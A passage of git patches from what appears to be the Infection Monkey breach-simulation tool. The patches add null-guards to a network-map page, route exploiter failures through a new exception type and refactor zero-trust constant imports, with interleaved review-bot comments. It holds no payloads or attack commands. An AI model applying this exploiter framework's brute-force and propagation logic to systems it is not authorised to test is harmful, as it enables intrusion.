deletions(-) diff --git a/monkey/monkey_island/cc/ui/src/components/pages/MapPage.js b/monkey/monkey_island/cc/ui/src/components/pages/MapPage.js index 4d074c835..f9d1f4a83 100644 --- a/monkey/monkey_island/cc/ui/src/components/pages/MapPage.js +++ b/monkey/monkey_island/cc/ui/src/components/pages/MapPage.js @@ -43,11 +43,13 @@ class MapPageComponent extends AuthComponent { this.authFetch('/api/netmap') .then(res => res.json()) .then(res => { - res.edges.forEach(edge => { - edge.color = {'color': edgeGroupToColor(edge.group)}; - }); - this.setState({graph: res}); - this.props.onStatusChange(); + if (res.hasOwnProperty("edges")) { + res.edges.forEach(edge => { + edge.color = {'color': edgeGroupToColor(edge.group)}; + }); + this.setState({graph: res}); + this.props.onStatusChange(); + } }); }; 
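Review bot: The two guards added in MapPage.js are inconsistent and only partially cover the failure they are meant to catch: the netmap hunk uses `res.hasOwnProperty("edges")` while the telemetry hunk on the next hunk uses `'telemetries' in res`, and both throw a TypeError when `res.json()` resolves to `null` or a non-object, so that case still produces the white screen the commit title refers to. A single form such as `if (res && Array.isArray(res.edges))` and `if (res && Array.isArray(res.telemetries))` handles both missing keys and non-object bodies. When the key is missing the response is now dropped silently and `this.props.onStatusChange()` is not called; a `console.warn` in that branch would make the condition observable, and neither promise chain shows a `.catch`, so a rejected fetch is also unreported as far as the hunks show.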
@@ -55,14 +57,16 @@ class MapPageComponent extends AuthComponent { this.authFetch('/api/telemetry-feed?timestamp='+this.state.telemetryLastTimestamp) .then(res => res.json()) .then(res => { - let newTelem = this.state.telemetry.concat(res['telemetries']); + if ('telemetries' in res) { + let newTelem = this.state.telemetry.concat(res['telemetries']); - this.setState( - { - telemetry: newTelem, - telemetryLastTimestamp: res['timestamp'] - }); - this.props.onStatusChange(); + this.setState( + { + telemetry: newTelem, + telemetryLastTimestamp: res['timestamp'] + }); + this.props.onStatusChange(); + } }); }; From e5715f5a7ea3286c52d4d0a252ca09477d6ba7ff Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Thu, 31 Oct 2019 12:11:22 +0200 Subject: [PATCH 41/44] Removed unnecessary logging of config in BB and MSSQL unhandled error --- envs/monkey_zoo/blackbox/tests/basic_test.py | 1 - monkey/infection_monkey/exploit/__init__.py | 6 ++++-- monkey/infection_monkey/exploit/mssqlexec.py | 4 ++-- monkey/infection_monkey/monkey.py | 6 +++++- 4 files changed, 11 insertions(+), 6 deletions(-) diff --git a/envs/monkey_zoo/blackbox/tests/basic_test.py b/envs/monkey_zoo/blackbox/tests/basic_test.py index d2fad4e1e..8456dccad 100644 --- a/envs/monkey_zoo/blackbox/tests/basic_test.py +++ b/envs/monkey_zoo/blackbox/tests/basic_test.py @@ -23,7 +23,6 @@ class BasicTest(object): self.log_handler = log_handler def run(self): - LOGGER.info("Uploading configuration:\n{}".format(json.dumps(self.config_parser.config_json, indent=2))) self.island_client.import_config(self.config_parser.config_raw) self.print_test_starting_info() try: diff --git a/monkey/infection_monkey/exploit/__init__.py b/monkey/infection_monkey/exploit/__init__.py index 9e899b140..0431e7295 100644 --- a/monkey/infection_monkey/exploit/__init__.py +++ b/monkey/infection_monkey/exploit/__init__.py 
@@ -47,8 +47,10 @@ class HostExploiter(object, metaclass=ABCMeta): def exploit_host(self): self.pre_exploit() - result = self._exploit_host() - self.post_exploit() + try: + result = self._exploit_host() + finally: + self.post_exploit() return result def pre_exploit(self): diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index dcad2adf1..dee597a18 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -11,7 +11,7 @@ from infection_monkey.exploit.tools.http_tools import MonkeyHTTPServer from infection_monkey.exploit.tools.helpers import get_monkey_dest_path, build_monkey_commandline, get_monkey_depth from infection_monkey.model import DROPPER_ARG from infection_monkey.exploit.tools.payload_parsing import LimitedSizePayload -from infection_monkey.exploit.tools.exceptions import ExploitingVulnerableMachineError +from infection_monkey.exploit.tools.exceptions import ExploitingVulnerableMachineError, FailedExploitationError LOG = logging.getLogger(__name__) @@ -185,7 +185,7 @@ class MSSQLExploiter(HostExploiter): LOG.warning('No user/password combo was able to connect to host: {0}:{1}, ' 'aborting brute force'.format(host, port)) - raise RuntimeError("Bruteforce process failed on host: {0}".format(self.host.ip_addr)) + raise FailedExploitationError("Bruteforce process failed on host: {0}".format(self.host.ip_addr)) class MSSQLLimitedSizePayload(LimitedSizePayload): diff --git a/monkey/infection_monkey/monkey.py b/monkey/infection_monkey/monkey.py index 3985c8a2e..3af70c796 100644 --- a/monkey/infection_monkey/monkey.py +++ b/monkey/infection_monkey/monkey.py 
@@ -26,7 +26,7 @@ from infection_monkey.telemetry.tunnel_telem import TunnelTelem from infection_monkey.windows_upgrader import WindowsUpgrader from infection_monkey.post_breach.post_breach_handler import PostBreach from infection_monkey.exploit.tools.helpers import get_interface_to_target -from infection_monkey.exploit.tools.exceptions import ExploitingVulnerableMachineError +from infection_monkey.exploit.tools.exceptions import ExploitingVulnerableMachineError, FailedExploitationError from infection_monkey.telemetry.attack.t1106_telem import T1106Telem from common.utils.attack_utils import ScanStatus, UsageEnum @@ -192,7 +192,9 @@ class InfectionMonkey(object): self._exploiters = sorted(self._exploiters, key=lambda exploiter_: exploiter_.EXPLOIT_TYPE.value) host_exploited = False for exploiter in [exploiter(machine) for exploiter in self._exploiters]: + if self.try_exploiting(machine, exploiter): + host_exploited = True VictimHostTelem('T1210', ScanStatus.USED, machine=machine).send() break @@ -311,6 +313,8 @@ class InfectionMonkey(object): machine, exploiter.__class__.__name__, exc) self.successfully_exploited(machine, exploiter) return True + except FailedExploitationError as e: + LOG.info("Failed exploiting %r with exploiter %s, %s", machine, exploiter.__class__.__name__, e) except Exception as exc: LOG.exception("Exception while attacking %s using %s: %s", machine, exploiter.__class__.__name__, exc) From c778ae7aa1ef87769ce41a7c8422e951bd556508 Mon Sep 17 00:00:00 2001 
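Review bot: In the `@@ -311` hunk the new `except FailedExploitationError as e:` handler binds the exception as `e` while the surrounding handlers use `exc`; writing `except FailedExploitationError as exc:` and passing `exc` to `LOG.info` keeps the naming uniform. The branch logs at INFO and then falls through to whatever follows the `try` (outside the hunk), which is the intended "expected failure" path, so a short comment such as `# an unsuccessful attempt is a normal outcome, not an error` would save the next reader from wondering why no `return` follows. The enclosing function begins and ends outside this hunk.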
From: Shay Nehmad Date: Mon, 4 Nov 2019 11:27:34 +0200 Subject: [PATCH 42/44] Changed import to `import common.data.zero_trust_consts as zero_trust_consts` Looks better --- .../cc/models/zero_trust/aggregate_finding.py | 6 +- .../cc/models/zero_trust/event.py | 4 +- .../cc/models/zero_trust/finding.py | 10 +- .../models/zero_trust/segmentation_finding.py | 6 +- .../zero_trust/test_aggregate_finding.py | 14 +- .../cc/models/zero_trust/test_event.py | 6 +- .../cc/models/zero_trust/test_finding.py | 16 +- .../zero_trust/test_segmentation_finding.py | 12 +- .../reporting/test_zero_trust_service.py | 252 +++++++++--------- .../services/reporting/zero_trust_service.py | 63 +++-- .../zero_trust_tests/antivirus_existence.py | 13 +- .../communicate_as_new_user.py | 11 +- .../zero_trust_tests/data_endpoints.py | 23 +- .../zero_trust_tests/machine_exploited.py | 12 +- .../zero_trust_tests/segmentation.py | 10 +- .../test_segmentation_zt_tests.py | 25 +- .../telemetry/zero_trust_tests/tunneling.py | 8 +- 17 files changed, 253 insertions(+), 238 deletions(-) diff --git a/monkey/monkey_island/cc/models/zero_trust/aggregate_finding.py b/monkey/monkey_island/cc/models/zero_trust/aggregate_finding.py index c3ed52649..38b551047 100644 --- a/monkey/monkey_island/cc/models/zero_trust/aggregate_finding.py +++ b/monkey/monkey_island/cc/models/zero_trust/aggregate_finding.py @@ -1,4 +1,4 @@ -from common.data.zero_trust_consts import TEST_MALICIOUS_ACTIVITY_TIMELINE, STATUS_VERIFY +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models.zero_trust.finding import Finding @@ -26,7 +26,7 @@ class AggregateFinding(Finding): def add_malicious_activity_to_timeline(events): AggregateFinding.create_or_add_to_existing( - test=TEST_MALICIOUS_ACTIVITY_TIMELINE, - status=STATUS_VERIFY, + test=zero_trust_consts.TEST_MALICIOUS_ACTIVITY_TIMELINE, + status=zero_trust_consts.STATUS_VERIFY, events=events ) 
diff --git a/monkey/monkey_island/cc/models/zero_trust/event.py b/monkey/monkey_island/cc/models/zero_trust/event.py index 6ad728d66..89b581fa0 100644 --- a/monkey/monkey_island/cc/models/zero_trust/event.py +++ b/monkey/monkey_island/cc/models/zero_trust/event.py @@ -2,7 +2,7 @@ from datetime import datetime from mongoengine import EmbeddedDocument, DateTimeField, StringField -from common.data.zero_trust_consts import EVENT_TYPES +import common.data.zero_trust_consts as zero_trust_consts class Event(EmbeddedDocument): @@ -19,7 +19,7 @@ class Event(EmbeddedDocument): timestamp = DateTimeField(required=True) title = StringField(required=True) message = StringField() - event_type = StringField(required=True, choices=EVENT_TYPES) + event_type = StringField(required=True, choices=zero_trust_consts.EVENT_TYPES) # LOGIC @staticmethod diff --git a/monkey/monkey_island/cc/models/zero_trust/finding.py b/monkey/monkey_island/cc/models/zero_trust/finding.py index df4eb12f7..90c9e1dc3 100644 --- a/monkey/monkey_island/cc/models/zero_trust/finding.py +++ b/monkey/monkey_island/cc/models/zero_trust/finding.py @@ -5,7 +5,7 @@ Define a Document Schema for Zero Trust findings. from mongoengine import Document, StringField, EmbeddedDocumentListField -from common.data.zero_trust_consts import ORDERED_TEST_STATUSES, TESTS, TESTS_MAP, TEST_EXPLANATION_KEY, PILLARS_KEY +import common.data.zero_trust_consts as zero_trust_consts # Dummy import for mongoengine. # noinspection PyUnresolvedReferences from monkey_island.cc.models.zero_trust.event import Event 
@@ -30,18 +30,18 @@ class Finding(Document): times, or complex action we will perform - somewhat like an API. """ # SCHEMA - test = StringField(required=True, choices=TESTS) - status = StringField(required=True, choices=ORDERED_TEST_STATUSES) + test = StringField(required=True, choices=zero_trust_consts.TESTS) + status = StringField(required=True, choices=zero_trust_consts.ORDERED_TEST_STATUSES) events = EmbeddedDocumentListField(document_type=Event) # http://docs.mongoengine.org/guide/defining-documents.html#document-inheritance meta = {'allow_inheritance': True} # LOGIC def get_test_explanation(self): - return TESTS_MAP[self.test][TEST_EXPLANATION_KEY] + return zero_trust_consts.TESTS_MAP[self.test][zero_trust_consts.TEST_EXPLANATION_KEY] def get_pillars(self): - return TESTS_MAP[self.test][PILLARS_KEY] + return zero_trust_consts.TESTS_MAP[self.test][zero_trust_consts.PILLARS_KEY] # Creation methods @staticmethod diff --git a/monkey/monkey_island/cc/models/zero_trust/segmentation_finding.py b/monkey/monkey_island/cc/models/zero_trust/segmentation_finding.py index 32a450f57..7633ed31f 100644 --- a/monkey/monkey_island/cc/models/zero_trust/segmentation_finding.py +++ b/monkey/monkey_island/cc/models/zero_trust/segmentation_finding.py @@ -1,11 +1,11 @@ from mongoengine import StringField -from common.data.zero_trust_consts import TEST_SEGMENTATION, STATUS_FAILED, STATUS_PASSED +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models.zero_trust.finding import Finding def need_to_overwrite_status(saved_status, new_status): - return (saved_status == STATUS_PASSED) and (new_status == STATUS_FAILED) + return (saved_status == zero_trust_consts.STATUS_PASSED) and (new_status == zero_trust_consts.STATUS_FAILED) class SegmentationFinding(Finding): 
@@ -35,7 +35,7 @@ class SegmentationFinding(Finding): new_finding = SegmentationFinding( first_subnet=subnets[0], second_subnet=subnets[1], - test=TEST_SEGMENTATION, + test=zero_trust_consts.TEST_SEGMENTATION, status=status, events=[segmentation_event] ) diff --git a/monkey/monkey_island/cc/models/zero_trust/test_aggregate_finding.py b/monkey/monkey_island/cc/models/zero_trust/test_aggregate_finding.py index 59bf1aa66..ce28ad7f7 100644 --- a/monkey/monkey_island/cc/models/zero_trust/test_aggregate_finding.py +++ b/monkey/monkey_island/cc/models/zero_trust/test_aggregate_finding.py @@ -1,4 +1,4 @@ -from common.data.zero_trust_consts import TEST_MALICIOUS_ACTIVITY_TIMELINE, STATUS_VERIFY, EVENT_TYPE_MONKEY_NETWORK +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding from monkey_island.cc.models.zero_trust.event import Event from monkey_island.cc.models.zero_trust.finding import Finding @@ -10,9 +10,9 @@ class TestAggregateFinding(IslandTestCase): self.fail_if_not_testing_env() self.clean_finding_db() - test = TEST_MALICIOUS_ACTIVITY_TIMELINE - status = STATUS_VERIFY - events = [Event.create_event("t", "t", EVENT_TYPE_MONKEY_NETWORK)] + test = zero_trust_consts.TEST_MALICIOUS_ACTIVITY_TIMELINE + status = zero_trust_consts.STATUS_VERIFY + events = [Event.create_event("t", "t", zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK)] self.assertEqual(len(Finding.objects(test=test, status=status)), 0) AggregateFinding.create_or_add_to_existing(test, status, events) 
@@ -29,9 +29,9 @@ class TestAggregateFinding(IslandTestCase): self.fail_if_not_testing_env() self.clean_finding_db() - test = TEST_MALICIOUS_ACTIVITY_TIMELINE - status = STATUS_VERIFY - event = Event.create_event("t", "t", EVENT_TYPE_MONKEY_NETWORK) + test = zero_trust_consts.TEST_MALICIOUS_ACTIVITY_TIMELINE + status = zero_trust_consts.STATUS_VERIFY + event = Event.create_event("t", "t", zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK) events = [event] self.assertEqual(len(Finding.objects(test=test, status=status)), 0) diff --git a/monkey/monkey_island/cc/models/zero_trust/test_event.py b/monkey/monkey_island/cc/models/zero_trust/test_event.py index c0742407d..4a5afba50 100644 --- a/monkey/monkey_island/cc/models/zero_trust/test_event.py +++ b/monkey/monkey_island/cc/models/zero_trust/test_event.py @@ -1,6 +1,6 @@ from mongoengine import ValidationError -from common.data.zero_trust_consts import EVENT_TYPE_MONKEY_NETWORK +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models.zero_trust.event import Event from monkey_island.cc.testing.IslandTestCase import IslandTestCase @@ -14,7 +14,7 @@ class TestEvent(IslandTestCase): _ = Event.create_event( title=None, # title required message="bla bla", - event_type=EVENT_TYPE_MONKEY_NETWORK + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK ) with self.assertRaises(ValidationError): @@ -28,5 +28,5 @@ class TestEvent(IslandTestCase): _ = Event.create_event( title="skjs", message="bla bla", - event_type=EVENT_TYPE_MONKEY_NETWORK + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK ) diff --git a/monkey/monkey_island/cc/models/zero_trust/test_finding.py b/monkey/monkey_island/cc/models/zero_trust/test_finding.py index c7190d0f1..4299f7eb4 100644 --- a/monkey/monkey_island/cc/models/zero_trust/test_finding.py +++ b/monkey/monkey_island/cc/models/zero_trust/test_finding.py 
@@ -1,6 +1,6 @@ from mongoengine import ValidationError -from common.data.zero_trust_consts import STATUS_FAILED, TEST_SEGMENTATION, EVENT_TYPE_MONKEY_NETWORK +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models.zero_trust.finding import Finding from monkey_island.cc.models.zero_trust.event import Event from monkey_island.cc.testing.IslandTestCase import IslandTestCase @@ -20,20 +20,20 @@ class TestFinding(IslandTestCase): self.clean_finding_db() with self.assertRaises(ValidationError): - _ = Finding.save_finding(test="bla bla", status=STATUS_FAILED, events=[]) + _ = Finding.save_finding(test="bla bla", status=zero_trust_consts.STATUS_FAILED, events=[]) with self.assertRaises(ValidationError): - _ = Finding.save_finding(test=TEST_SEGMENTATION, status="bla bla", events=[]) + _ = Finding.save_finding(test=zero_trust_consts.TEST_SEGMENTATION, status="bla bla", events=[]) def test_save_finding_sanity(self): self.fail_if_not_testing_env() self.clean_finding_db() - self.assertEqual(len(Finding.objects(test=TEST_SEGMENTATION)), 0) + self.assertEqual(len(Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION)), 0) event_example = Event.create_event( - title="Event Title", message="event message", event_type=EVENT_TYPE_MONKEY_NETWORK) - Finding.save_finding(test=TEST_SEGMENTATION, status=STATUS_FAILED, events=[event_example]) + title="Event Title", message="event message", event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK) + Finding.save_finding(test=zero_trust_consts.TEST_SEGMENTATION, status=zero_trust_consts.STATUS_FAILED, events=[event_example]) - self.assertEqual(len(Finding.objects(test=TEST_SEGMENTATION)), 1) - self.assertEqual(len(Finding.objects(status=STATUS_FAILED)), 1) + self.assertEqual(len(Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION)), 1) + self.assertEqual(len(Finding.objects(status=zero_trust_consts.STATUS_FAILED)), 1) 
diff --git a/monkey/monkey_island/cc/models/zero_trust/test_segmentation_finding.py b/monkey/monkey_island/cc/models/zero_trust/test_segmentation_finding.py index 8258d7bdf..4afff9fe4 100644 --- a/monkey/monkey_island/cc/models/zero_trust/test_segmentation_finding.py +++ b/monkey/monkey_island/cc/models/zero_trust/test_segmentation_finding.py @@ -1,4 +1,4 @@ -from common.data.zero_trust_consts import STATUS_FAILED, EVENT_TYPE_MONKEY_NETWORK +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models.zero_trust.event import Event from monkey_island.cc.testing.IslandTestCase import IslandTestCase from monkey_island.cc.models.zero_trust.segmentation_finding import SegmentationFinding @@ -12,11 +12,11 @@ class TestSegmentationFinding(IslandTestCase): first_segment = "1.1.1.0/24" second_segment = "2.2.2.0-2.2.2.254" third_segment = "3.3.3.3" - event = Event.create_event("bla", "bla", EVENT_TYPE_MONKEY_NETWORK) + event = Event.create_event("bla", "bla", zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK) SegmentationFinding.create_or_add_to_existing_finding( subnets=[first_segment, second_segment], - status=STATUS_FAILED, + status=zero_trust_consts.STATUS_FAILED, segmentation_event=event ) @@ -26,7 +26,7 @@ class TestSegmentationFinding(IslandTestCase): SegmentationFinding.create_or_add_to_existing_finding( # !!! REVERSE ORDER subnets=[second_segment, first_segment], - status=STATUS_FAILED, + status=zero_trust_consts.STATUS_FAILED, segmentation_event=event ) @@ -36,7 +36,7 @@ class TestSegmentationFinding(IslandTestCase): SegmentationFinding.create_or_add_to_existing_finding( # !!! REVERSE ORDER subnets=[first_segment, third_segment], - status=STATUS_FAILED, + status=zero_trust_consts.STATUS_FAILED, segmentation_event=event ) 
@@ -45,7 +45,7 @@ class TestSegmentationFinding(IslandTestCase): SegmentationFinding.create_or_add_to_existing_finding( # !!! REVERSE ORDER subnets=[second_segment, third_segment], - status=STATUS_FAILED, + status=zero_trust_consts.STATUS_FAILED, segmentation_event=event ) diff --git a/monkey/monkey_island/cc/services/reporting/test_zero_trust_service.py b/monkey/monkey_island/cc/services/reporting/test_zero_trust_service.py index 98b99ac13..328be2e00 100644 --- a/monkey/monkey_island/cc/services/reporting/test_zero_trust_service.py +++ b/monkey/monkey_island/cc/services/reporting/test_zero_trust_service.py 
@@ -1,185 +1,197 @@ -from common.data.zero_trust_consts import AUTOMATION_ORCHESTRATION, DATA, PRINCIPLES, PRINCIPLE_DATA_TRANSIT, STATUS_FAILED, \ - TESTS_MAP, TEST_DATA_ENDPOINT_HTTP, TEST_EXPLANATION_KEY, STATUS_UNEXECUTED, TEST_DATA_ENDPOINT_ELASTIC, DEVICES, \ - PRINCIPLE_ENDPOINT_SECURITY, TEST_MACHINE_EXPLOITED, TEST_ENDPOINT_SECURITY_EXISTS, NETWORKS, PRINCIPLE_SEGMENTATION, \ - TEST_SEGMENTATION, PRINCIPLE_USER_BEHAVIOUR, STATUS_VERIFY, TEST_SCHEDULED_EXECUTION, PRINCIPLE_USERS_MAC_POLICIES, \ - TEST_COMMUNICATE_AS_NEW_USER, PRINCIPLE_ANALYZE_NETWORK_TRAFFIC, TEST_MALICIOUS_ACTIVITY_TIMELINE, \ - PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES, TEST_TUNNELING, PEOPLE, VISIBILITY_ANALYTICS, WORKLOADS, STATUS_PASSED +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models.zero_trust.finding import Finding from monkey_island.cc.services.reporting.zero_trust_service import ZeroTrustService from monkey_island.cc.testing.IslandTestCase import IslandTestCase EXPECTED_DICT = { - AUTOMATION_ORCHESTRATION: [], - DATA: [ + zero_trust_consts.AUTOMATION_ORCHESTRATION: [], + zero_trust_consts.DATA: [ { - "principle": PRINCIPLES[PRINCIPLE_DATA_TRANSIT], - "status": STATUS_FAILED, + "principle": zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_DATA_TRANSIT], + "status": zero_trust_consts.STATUS_FAILED, "tests": [ { - "status": STATUS_FAILED, - "test": TESTS_MAP[TEST_DATA_ENDPOINT_HTTP][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_FAILED, + "test": zero_trust_consts.TESTS_MAP + [zero_trust_consts.TEST_DATA_ENDPOINT_HTTP][zero_trust_consts.TEST_EXPLANATION_KEY] }, { - "status": STATUS_UNEXECUTED, - "test": TESTS_MAP[TEST_DATA_ENDPOINT_ELASTIC][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_UNEXECUTED, + "test": zero_trust_consts.TESTS_MAP + [zero_trust_consts.TEST_DATA_ENDPOINT_ELASTIC][zero_trust_consts.TEST_EXPLANATION_KEY] }, ] } ], - DEVICES: [ + zero_trust_consts.DEVICES: [ { - "principle": 
PRINCIPLES[PRINCIPLE_ENDPOINT_SECURITY], - "status": STATUS_FAILED, + "principle": zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_ENDPOINT_SECURITY], + "status": zero_trust_consts.STATUS_FAILED, "tests": [ { - "status": STATUS_UNEXECUTED, - "test": TESTS_MAP[TEST_MACHINE_EXPLOITED][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_UNEXECUTED, + "test": zero_trust_consts.TESTS_MAP + [zero_trust_consts.TEST_MACHINE_EXPLOITED][zero_trust_consts.TEST_EXPLANATION_KEY] }, { - "status": STATUS_FAILED, - "test": TESTS_MAP[TEST_ENDPOINT_SECURITY_EXISTS][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_FAILED, + "test": zero_trust_consts.TESTS_MAP + [zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS][zero_trust_consts.TEST_EXPLANATION_KEY] }, ] } ], - NETWORKS: [ + zero_trust_consts.NETWORKS: [ { - "principle": PRINCIPLES[PRINCIPLE_SEGMENTATION], - "status": STATUS_UNEXECUTED, + "principle": zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_SEGMENTATION], + "status": zero_trust_consts.STATUS_UNEXECUTED, "tests": [ { - "status": STATUS_UNEXECUTED, - "test": TESTS_MAP[TEST_SEGMENTATION][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_UNEXECUTED, + "test": zero_trust_consts.TESTS_MAP[zero_trust_consts.TEST_SEGMENTATION][ + zero_trust_consts.TEST_EXPLANATION_KEY] } ] }, { - "principle": PRINCIPLES[PRINCIPLE_USER_BEHAVIOUR], - "status": STATUS_VERIFY, + "principle": zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_USER_BEHAVIOUR], + "status": zero_trust_consts.STATUS_VERIFY, "tests": [ { - "status": STATUS_VERIFY, - "test": TESTS_MAP[TEST_SCHEDULED_EXECUTION][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_VERIFY, + "test": zero_trust_consts.TESTS_MAP[zero_trust_consts.TEST_SCHEDULED_EXECUTION][ + zero_trust_consts.TEST_EXPLANATION_KEY] } ] }, { - "principle": PRINCIPLES[PRINCIPLE_USERS_MAC_POLICIES], - "status": STATUS_UNEXECUTED, + "principle": 
zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_USERS_MAC_POLICIES], + "status": zero_trust_consts.STATUS_UNEXECUTED, "tests": [ { - "status": STATUS_UNEXECUTED, - "test": TESTS_MAP[TEST_COMMUNICATE_AS_NEW_USER][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_UNEXECUTED, + "test": zero_trust_consts.TESTS_MAP[zero_trust_consts.TEST_COMMUNICATE_AS_NEW_USER][ + zero_trust_consts.TEST_EXPLANATION_KEY] } ] }, { - "principle": PRINCIPLES[PRINCIPLE_ANALYZE_NETWORK_TRAFFIC], - "status": STATUS_UNEXECUTED, + "principle": zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_ANALYZE_NETWORK_TRAFFIC], + "status": zero_trust_consts.STATUS_UNEXECUTED, "tests": [ { - "status": STATUS_UNEXECUTED, - "test": TESTS_MAP[TEST_MALICIOUS_ACTIVITY_TIMELINE][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_UNEXECUTED, + "test": zero_trust_consts.TESTS_MAP[zero_trust_consts.TEST_MALICIOUS_ACTIVITY_TIMELINE][ + zero_trust_consts.TEST_EXPLANATION_KEY] } ] }, { - "principle": PRINCIPLES[PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES], - "status": STATUS_UNEXECUTED, + "principle": zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES], + "status": zero_trust_consts.STATUS_UNEXECUTED, "tests": [ { - "status": STATUS_UNEXECUTED, - "test": TESTS_MAP[TEST_TUNNELING][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_UNEXECUTED, + "test": zero_trust_consts.TESTS_MAP[zero_trust_consts.TEST_TUNNELING][ + zero_trust_consts.TEST_EXPLANATION_KEY] } ] }, ], - PEOPLE: [ + zero_trust_consts.PEOPLE: [ { - "principle": PRINCIPLES[PRINCIPLE_USER_BEHAVIOUR], - "status": STATUS_VERIFY, + "principle": zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_USER_BEHAVIOUR], + "status": zero_trust_consts.STATUS_VERIFY, "tests": [ { - "status": STATUS_VERIFY, - "test": TESTS_MAP[TEST_SCHEDULED_EXECUTION][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_VERIFY, + "test": 
zero_trust_consts.TESTS_MAP[zero_trust_consts.TEST_SCHEDULED_EXECUTION][ + zero_trust_consts.TEST_EXPLANATION_KEY] } ] }, { - "principle": PRINCIPLES[PRINCIPLE_USERS_MAC_POLICIES], - "status": STATUS_UNEXECUTED, + "principle": zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_USERS_MAC_POLICIES], + "status": zero_trust_consts.STATUS_UNEXECUTED, "tests": [ { - "status": STATUS_UNEXECUTED, - "test": TESTS_MAP[TEST_COMMUNICATE_AS_NEW_USER][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_UNEXECUTED, + "test": zero_trust_consts.TESTS_MAP[zero_trust_consts.TEST_COMMUNICATE_AS_NEW_USER][ + zero_trust_consts.TEST_EXPLANATION_KEY] } ] } ], - VISIBILITY_ANALYTICS: [ + zero_trust_consts.VISIBILITY_ANALYTICS: [ { - "principle": PRINCIPLES[PRINCIPLE_USERS_MAC_POLICIES], - "status": STATUS_UNEXECUTED, + "principle": zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_USERS_MAC_POLICIES], + "status": zero_trust_consts.STATUS_UNEXECUTED, "tests": [ { - "status": STATUS_UNEXECUTED, - "test": TESTS_MAP[TEST_COMMUNICATE_AS_NEW_USER][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_UNEXECUTED, + "test": zero_trust_consts.TESTS_MAP[zero_trust_consts.TEST_COMMUNICATE_AS_NEW_USER][ + zero_trust_consts.TEST_EXPLANATION_KEY] } ] }, { - "principle": PRINCIPLES[PRINCIPLE_ANALYZE_NETWORK_TRAFFIC], - "status": STATUS_UNEXECUTED, + "principle": zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_ANALYZE_NETWORK_TRAFFIC], + "status": zero_trust_consts.STATUS_UNEXECUTED, "tests": [ { - "status": STATUS_UNEXECUTED, - "test": TESTS_MAP[TEST_MALICIOUS_ACTIVITY_TIMELINE][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_UNEXECUTED, + "test": zero_trust_consts.TESTS_MAP[zero_trust_consts.TEST_MALICIOUS_ACTIVITY_TIMELINE][ + zero_trust_consts.TEST_EXPLANATION_KEY] } ] }, { - "principle": PRINCIPLES[PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES], - "status": STATUS_UNEXECUTED, + "principle": 
zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES], + "status": zero_trust_consts.STATUS_UNEXECUTED, "tests": [ { - "status": STATUS_UNEXECUTED, - "test": TESTS_MAP[TEST_TUNNELING][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_UNEXECUTED, + "test": zero_trust_consts.TESTS_MAP[zero_trust_consts.TEST_TUNNELING][ + zero_trust_consts.TEST_EXPLANATION_KEY] } ] }, ], - WORKLOADS: [] + zero_trust_consts.WORKLOADS: [] } def save_example_findings(): # arrange - Finding.save_finding(TEST_ENDPOINT_SECURITY_EXISTS, STATUS_PASSED, []) # devices passed = 1 - Finding.save_finding(TEST_ENDPOINT_SECURITY_EXISTS, STATUS_PASSED, []) # devices passed = 2 - Finding.save_finding(TEST_ENDPOINT_SECURITY_EXISTS, STATUS_FAILED, []) # devices failed = 1 + Finding.save_finding(zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS, zero_trust_consts.STATUS_PASSED, + []) # devices passed = 1 + Finding.save_finding(zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS, zero_trust_consts.STATUS_PASSED, + []) # devices passed = 2 + 